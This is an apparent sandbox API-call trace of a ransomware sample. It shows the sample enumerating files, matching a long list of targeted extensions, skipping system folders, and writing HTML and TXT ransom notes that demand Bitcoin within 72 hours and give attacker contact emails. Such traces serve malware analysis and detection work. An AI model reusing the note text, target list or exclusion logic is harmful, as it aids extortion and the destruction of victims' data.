	[0167.752] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.752] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"
	[0167.752] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93
	[0167.752] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.752] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.753] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.753] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 0
	[0167.753] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.756] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.757] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}"
	[0167.757] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*"
	[0167.757] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.757] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.757] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0167.757] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.761] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.761] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.764] CloseHandle (hObject=0x390) returned 1
	[0167.764] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.766] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0167.769] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.769] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.770] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.770] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.770] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0167.770] CloseHandle (hObject=0x390) returned 1
	[0167.771] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.771] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.771] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.771] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0167.772] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.772] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.772] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0167.775] CloseHandle (hObject=0x390) returned 1
	[0167.776] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.777] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0167.778] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.778] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.778] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.778] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.778] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0167.779] CloseHandle (hObject=0x390) returned 1
	[0167.779] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7d87d0a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.780] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 89
	[0167.780] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.780] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 0x59
	[0167.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.780] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="windows") returned 0x0
	[0167.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.780] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="boot") returned 0x0
	[0167.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.781] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.781] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.782] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.782] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="temp") returned 0x0
	[0167.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.782] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="program files") returned 0x0
	[0167.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.782] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="appdata") returned 0x0
	[0167.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="application data") returned 0x0
	[0167.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="winnt") returned 0x0
	[0167.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="tmp") returned 0x0
	[0167.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="cache") returned 0x0
	[0167.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="webcache") returned 0x0
	[0167.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="packages") returned 0x0
	[0167.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="cookies") returned 0x0
	[0167.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="programdata") returned 0x0
	[0167.786] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.786] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.786] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7d87d0a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.786] lstrcmpW (lpString1="..", lpString2="..") returned 0
